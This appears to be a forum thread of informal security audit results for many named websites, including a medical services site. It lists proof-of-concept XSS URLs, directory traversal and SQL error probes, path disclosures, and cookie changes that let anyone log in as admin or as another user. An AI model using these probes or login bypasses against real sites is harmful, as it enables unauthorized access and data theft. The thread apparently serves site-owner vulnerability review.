agentsteal

Cross Site Scripting: There is Cross Site Scripting if the description contains code.

Array: http://www.mdoneonone.com/rrg/index.php?task=view&id[] Array: http://www.mdoneonone.com/rrg/index.php?task=profile&p=2&id[] Cross Site Scripting: http://www.mdoneonone.com/rrg/index.php?task=profile&p=2&id="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on http://www.mdoneonone.com/rrg/index.php?task=search if a search contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Cross Site Scripting: http://www.mdoneonone.com/rrg/index.php?task=view&id="><marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.mdoneonone.com/includes/ Full Path Disclosure: http://www.mdoneonone.com/rrg/index.php?task=view Full Path Disclosure: http://www.mdoneonone.com/rrg/index.php?cat_id=3&page Full Path Disclosure: http://www.mdoneonone.com/rrg/content/media.php Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. You can log in as any user by changing the ava_username cookie and the ava_code cookie to their username and password.

Array: http://www.antiup.net/account.php?id[] Cross Site Scripting: There is Cross Site Scripting in the image upload. Cross Site Scripting: There is Cross Site Scripting in the swf upload. Full Path Disclosure: http://www.antiup.net/delete.php Insecure Cookie: You shouldn't put the password in the cookie. Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.antiup.net/~root

Admin Access: You can log in as admin by changing the user cookie to 18. Array: http://www.eastlancsmedicalservices.co.uk/ipAddresses.php?add[] Array: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir[] Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/ipAddresses.php?add=<marquee>vulnerable Cross Site Scripting: There is Cross Site Scripting in the contacts if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting on http://www.eastlancsmedicalservices.co.uk/idSearch.php if the id number contains code. Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you edit a profile if the fields contain '>code. Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s=<marquee><h1>vulnerable</marquee> Directory Transversal: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=../ Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/cal.php?mon[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser=a Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/adminModual.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/callLog.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/holidayRota.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/nav.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/login.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/left.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/right.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/rota.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewRequestedShifts.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/shiftReportModual.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/shifts.php Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewShiftReport.php?mon[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewServices.php?s[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewUsers.php?s[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewSites.php?s[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s[] Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewSites.php?s=-1 Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewUsers.php?s=-1 Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/viewServices.php?s=-1 Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/oohBible.php?dir=a Full Path Disclosure: http://www.eastlancsmedicalservices.co.uk/pages.php You can log in as any user if you change the user cookie to their user id. SQL Error: http://www.eastlancsmedicalservices.co.uk/viewShiftReportAll.php?s=a SQL Error: There is an SQL Error on http://www.eastlancsmedicalservices.co.uk/idSearch.php if the id number contains an invalid value. SQL Error: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?supUser=' SQL Error: http://www.eastlancsmedicalservices.co.uk/checkProcessingJobs.php?s=-1 SQL Error: http://www.eastlancsmedicalservices.co.uk/editJob.php SQL Error: http://www.eastlancsmedicalservices.co.uk/edit4weekRota.php

Admin Access: Anyone can get your username and password through the PHP Source Code Disclosure. Admin Access: Anyone can edit the files on the site through the Directory Transversal. Admin Access: If you upload a PHP file you can run PHP code on the server. Cross Site Scripting: There is Cross Site Scripting when you register if your username contains >code. Directory Transversal: There is Directory Transversal if your username contains ../ Directory Transversal: http://www.filepile.ca/pdoc.php?url=Li4vaW5kZXguaHRtbA Directory Transversal: http://www.filepile.ca/account.php?f=Li4v Directory Transversal: There is Directory Transversal if you create a folder that contains ../ Directory Transversal: There is Directory Transversal if you move a folder that contains ../ Directory Transversal: There is Directory Transversal if you delete a folder that contains ../ Directory Transversal: There is Directory Transversal if you delete a file that contains ../ Directory Transversal: There is Directory Transversal if you move a file that contains ../ Full Path Disclosure: http://www.filepile.ca/move.php?f[] Full Path Disclosure: http://www.filepile.ca/account.php?f[] Full Path Disclosure: http://www.filepile.ca/ppub.php?url[] Full Path Disclosure: There is Full Path Disclosure if your username contains ../ Full Path Disclosure: http://www.filepile.ca/pdoc.php?url[] Full Path Disclosure: http://www.filepile.ca/doc.php?f[] Full Path Disclosure: There is Full Path Disclosure on http://www.filepile.ca/pdoc.php?url[] if you submit the download. Full Path Disclosure: http://www.filepile.ca/phpinfo.php Full Path Disclosure: http://www.filepile.ca/error_log PHP Source Code Disclosure: There is PHP Source Code Disclosure on http://www.filepile.ca/pdoc.php if the url is set to the base64 of a PHP page. PHP Source Code Disclosure: There is PHP Source Code Disclosure on http://www.filepile.ca/doc.php if the f is set to the base64 of a PHP page. User Enumeration: http://www.filepile.ca/~matts15 User Enumeration: http://www.filepile.ca/~nobody User Enumeration: http://www.filepile.ca/~root You can access any user's files in http://www.filepile.ca/members/.

Cross Site Scripting: There is Cross Site Scripting when you log in if your username contains ">code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting in the profile if the fields contain ">code. User Enumeration: http://www.socialgrabbr.com/~pokebash User Enumeration: http://www.socialgrabbr.com/~root

Array: http://www.wikiproxy.net/view.php?e[] Array: http://www.wikiproxy.net/view.php?t[] Array: http://www.wikiproxy.net/login.php?e[] Array: http://www.wikiproxy.net/login.php?t[] Array: http://www.wikiproxy.net/logout.php?e[] Array: http://www.wikiproxy.net/logout.php?t[] Cross Site Scripting: http://www.wikiproxy.net/view.php?e="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.wikiproxy.net/view.php?t="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.wikiproxy.net/login.php?e="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.wikiproxy.net/login.php?t="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.wikiproxy.net/logout.php?e="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.wikiproxy.net/logout.php?t="><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you log in if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting when you create a ticket if the fields contain ">code.

Cross Site Scripting: There is Cross Site Scripting if the search contains code. Cross Site Scripting: There is Cross Site Scripting if the search contains ">code. User Enumeration: http://www.render-works.com/~root

Array: http://www.tune.pk/view_channel.php?user[] Cross Site Scripting: http://www.tune.pk/compose.php?msg=<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.tune.pk/phpinfo.php Full Path Disclosure: http://www.tune.pk/channels.php?page=-1 Full Path Disclosure: http://www.tune.pk/channels.php?order[] Full Path Disclosure: http://www.tune.pk/includes/classes/captcha/example.php?code[] Full Path Disclosure: http://www.tune.pk/includes/classes/captcha/example2.php?code[] Full Path Disclosure: http://www.tune.pk/includes/active.php Full Path Disclosure: http://www.tune.pk/includes/defined_links.php Full Path Disclosure: http://www.tune.pk/includes/modules.php Full Path Disclosure: http://www.tune.pk/includes/adodb/adodb.php Full Path Disclosure: http://www.tune.pk/includes/adodb/contrib/toxmlrpc.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/datadict/datadict-firebird.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_mssql.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_mysql.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_oci.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-pdo_pgsql.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/drivers/adodb-sybase_ase.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/pear/Auth/Container/ADOdb.php Full Path Disclosure: http://www.tune.pk/includes/adodb/session/adodb-compress-bzip2.php Full Path Disclosure: http://www.tune.pk/includes/adodb/session/adodb-encrypt-secret.php Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-cryptsession.php Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-session-clob.php Full Path Disclosure: http://www.tune.pk/includes/adodb/session/old/adodb-session.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/benchmark.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/pdo.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-active-record.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-active-recs2.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-datadict.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-php5.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test-xmlschema.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test2.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test3.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/test4.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testcache.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testdatabases.inc.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testoci8.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testoci8cursor.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testpaging.php Full Path Disclosure: http://www.tune.pk/includes/adodb/tests/testpear.php Full Path Disclosure: http://www.tune.pk/includes/classes/TFile.php Full Path Disclosure: http://www.tune.pk/includes/playerconfig/config.xml.php Full Path Disclosure: http://www.tune.pk/includes/templatelib/Template_Compiler.class.php Full Path Disclosure: http://www.tune.pk/includes/templatelib/plugins/modifier.date_format.php Includes Directory: http://www.tune.pk/includes/ Insecure Cookie: You shouldn't put the username in the cookie. SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.mysql.sql SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.oracle.clob.sql SQL Dump: http://www.tune.pk/includes/adodb/session/adodb-sessions.oracle.sql SQL Dump: http://www.tune.pk/includes/adodb/tests/test-datadict.php User Enumeration: http://www.tune.pk/~tuneepk

Cross Site Scripting: There is Cross Site Scripting if the email address contains ">code. Cross Site Scripting: There is Cross Site Scripting if the referrer contains ">code. Cross Site Scripting: There is Cross Site Scripting if the style contains ">code. Cross Site Scripting: There is Cross Site Scripting if the name contains ">code. Cross Site Scripting: There is Cross Site Scripting if the hits contains ">code. Cross Site Scripting: There is Cross Site Scripting if the ip address contains ">code. Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?u=main&style[] Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?w[] Full Path Disclosure: http://www.omfg.ws/count3.0/counter.php?u=main&style=a Full Path Disclosure: There is Full Path Disclosure if the name is set to an invalid value. Log File: http://www.omfg.ws/log.html SQL Dump: http://www.omfg.ws/count3.0/db.txt

Cross Site Scripting: There is Cross Site Scripting if your username contains code. Null User: You can register a null password. Null User: You can register a null username. SQL Error: There is an SQL Error when you vote if the poll_id contains an invalid value.

Array: http://www.inet411.com/tools/validate-pagerank/index.html?site[] Array: http://www.inet411.com/ads/ads.ads?id=1&site[] Cross Site Scripting: http://www.inet411.com/<marquee><h1>vulnerable Cross Site Scripting: http://www.inet411.com/tools/validate-pagerank/index.html?site=<marquee><h1>vulnerable Cross Site Scripting: http://www.inet411.com/3rdparty/php_file_tree/demo_classic.php/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.inet411.com/ads/ads.ads?id=1&site=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting on http://www.inet411.com/ads/create_ad.html if the fields contain ">code. Cross Site Scripting: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page=<marquee><h1>vulnerable Full Path Disclosure: http://www.inet411.com/rss-feeds/clickbank/clickbank.feed Full Path Disclosure: There is Full Path Disclosure on http://www.inet411.com/tools/validate-pagerank/index.html if the URL is invalid. Full Path Disclosure: http://www.inet411.com/rss-feeds/clickbank/clickbank.feed?q=a Full Path Disclosure: http://www.inet411.com/3rdparty/php_file_tree/demo_classic.php Full Path Disclosure: http://www.inet411.com/tools/validate-pagerank/index.html?site=' Full Path Disclosure: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page[] Full Path Disclosure: http://www.inet411.com/tools/expired-domains-with-pagerank/index.html?page=a User Enumeration: http://www.inet411.com/~inet411

Array: http://www.omfg.ws/count2.0/counter.php?u=main&style[] Cross Site Scripting: There is Cross Site Scripting if the email address contains ">code. Cross Site Scripting: http://www.omfg.ws/count2.0/counter.php?u=<marquee><h1>vulnerable</marquee> Directory Transversal: http://www.omfg.ws/count2.0/counter.php?a&u=../counter&style=2&w=11&h=15&meh.jpg Full Path Disclosure: There is Full Path Disclosure if the name is null. Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?w[] Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?u=main&style=a Full Path Disclosure: http://www.omfg.ws/count2.0/counter.php?u=a Log File: http://www.omfg.ws/log.html

Array: http://www2.winmastergames.com:82/youdownload/hashlink.php?vidid[] Array: http://www2.winmastergames.com:82/youdownload/opendataconnection.php?vidid[] Cross Site Scripting: http://www2.winmastergames.com:82/youdownload/hashlink.php?vidid=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www2.winmastergames.com:82/youdownload/opendataconnection.php?vidid=<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www2.winmastergames.com:82/youdownload/yonderdowntest.php?url=http://www.youtube.com Full Path Disclosure: http://www2.winmastergames.com:82/youdownload/yonderdowntest2.php?url=http://www.youtube.com

Cross Site Scripting: http://www.interpim.com/testme/index.php?page=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting when you sign the guestbook if the fields contain code.

Cross Site Scripting: There is Cross Site Scripting when you log in if your username contains '>code. Insecure Cookie: You shouldn't put the username in the cookie. User Enumeration: http://www.trenttompkins.com/~nobody User Enumeration: http://www.trenttompkins.com/~root User Enumeration: http://www.trenttompkins.com/~trenttom

Array: http://www.wiuartinny.com/thumb.php?src[] Cross Site Scripting: There is Cross Site Scripting when you upload an image if the title contains code. Directory Transversal: http://www.wiuartinny.com/thumb.php?src=../images/title.jpg&display=medium Drop Down Menu: If you edit the drop down menu on http://www.wiuartinny.com/account.php you can submit arbitrary values. DOS: There is a DOS if you submit 9999999999999999999999 in the drop down menu on http://www.wiuartinny.com/account.php. Full Path Disclosure: http://www.wiuartinny.com/gallery.php?id[] Full Path Disclosure: http://www.wiuartinny.com/thumb.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie contains an invalid value. Full Path Disclosure: http://www.wiuartinny.com/thumb.php?src=a Full Path Disclosure: http://www.wiuartinny.com/thumb.php?src=655.jpg Full Path Disclosure: http://www.wiuartinny.com/account.php?page[] SQL Error: http://www.wiuartinny.com/gallery.php?page=' SQL Error: http://www.wiuartinny.com/account.php?page='

Array: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email[] Array: http://my.comfypage.com/agentsteal/function.php?function=Appointment%20Request&success[] Array: http://my.comfypage.com/agentsteal/mail.php?success[] Array: http://my.comfypage.com/agentsteal/files.php?folder[] Array: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password[] Array: http://www.comfypage.com/index.php?postback=Mailing+List&list_email[] Array: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email[] Cross Site Scripting: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.comfypage.com/index.php?postback=My+ComfyPage+Signup&password="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.comfypage.com/index.php?postback=Mailing+List&list_email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://my.comfypage.com/agentsteal/function.php?function=Appointment Request&success=<marquee><h1>vulnerable Cross Site Scripting: http://my.comfypage.com/agentsteal/mail.php?success=<marquee><h1>vulnerable Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Mailing List if the fields contain </textarea>code. Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/files.php if a folder contains ">code. Cross Site Scripting: There is Cross Site Scripting if your email address contains ">code. Cross Site Scripting: There is Cross Site Scripting when you contact support if your email address contains ">code. Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/register_with_existing_domain.php if the domain contains ">code. Cross Site Scripting: There is Cross Site Scripting when you contact support if your message contains </textarea>code. Cross Site Scripting: There is Cross Site Scripting when you add a product if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on http://my.comfypage.com/agentsteal/function.php?function=Appointment Request if the fields contain ">code. Cross Site Scripting: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&email="><marquee><h1>vulnerable</marquee> Drop Down Menu: If you edit the drop down menus on http://my.comfypage.com/agentsteal/admin.php you can submit arbitrary values. Full Path Disclosure: http://my.comfypage.com/agentsteal1/admin.php?copy Full Path Disclosure: http://www.comfypage.com/index.php?content_id=2&postback=Contact+Form&message[] Full Path Disclosure: There is Full Path Disclosure on http://my.comfypage.com/agentsteal/register_confirm.php when you submit the form. Full Path Disclosure: http://my.comfypage.com/agentsteal/margins.php?edit[] Full Path Disclosure: http://my.comfypage.com/agentsteal/function.php Full Path Disclosure: http://my.comfypage.com/agentsteal/files.php?folder=a

Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Pickems/Admin.php if the fields contain code. Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Pickems/Admin.php if the drop down menus contain code. Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/MySquares.php if the drop down menu contains </select>code. Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/Print_Squares.php if the drop down menu contains </select>code. Cross Site Scripting: There is Cross Site Scripting on http://www.phppicks.com/Demo_Squares/Price_I_Owe.php if the drop down menu contains </select>code. Drop Down Menu: If you edit the drop down menus on http://www.phppicks.com/Demo_Pickems/Admin.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/MySquares.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/MySquares.php you can submit arbitrary values. Drop Down Menu: If you edit the drop down menu on http://www.phppicks.com/Demo_Squares/Price_I_Owe.php you can submit arbitrary values. Maximum Length: If you edit the input boxes on http://www.phppicks.com/Demo_Pickems/Admin.php you can submit arbitrary values.

Array: http://vampirecity.cx-music.com/covensimwith.php?u[] Array: http://vampirecity.cx-music.com/friendswith.php?u[] Array: http://vampirecity.cx-music.com/friendsof.php?u[] Array: http://vampirecity.cx-music.com/contest.php?contest[] Array: http://vampirecity.cx-music.com/miq.php?mi[] Array: http://vampirecity.cx-music.com/bdays.php?bmonth[] Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting when you edit your profile if the fields contain ">code. Cross Site Scripting: There is Cross Site Scripting in the videos if the fields contain code. Cross Site Scripting: There is Cross Site Scripting in the pictures if a comment contains code. Cross Site Scripting: There is Cross Site Scripting when you submit questions if the mi contains ">code. Drop Down Menu: If you edit the drop down menus on the edit profile page you can submit arbitrary values. Full Path Disclosure: http://vampirecity.cx-music.com/includes/footer.php Full Path Disclosure: http://vampirecity.cx-music.com/games/includes/footer.php Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value. Full Path Disclosure: http://vampirecity.cx-music.com/bdays.php?orderby=' Full Path Disclosure: http://vampirecity.cx-music.com/forum/includes/footer.php Full Path Disclosure: http://vampirecity.cx-music.com/ShoppingCart.php Includes Directory: http://vampirecity.cx-music.com/inc/ Includes Directory: http://vampirecity.cx-music.com/includes/ Includes Directory: http://vampirecity.cx-music.com/games/ Includes Directory: http://vampirecity.cx-music.com/forum/includes/ Log File: http://vampirecity.cx-music.com/images/WS_FTP.LOG

The OP sent me a request to remove the links. As most of the errors were due to manipulating the URLs, I sent the OP the original content of this post for reference. -- roopurt18

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.

Cross Site Scripting: There is Cross Site Scripting if a debate's title contains code.

User Enumeration: http://www.venuspoetry.com/~root User Enumeration: http://www.venuspoetry.com/~venus

Full Path Disclosure: There is Full Path Disclosure if you upload an invalid image.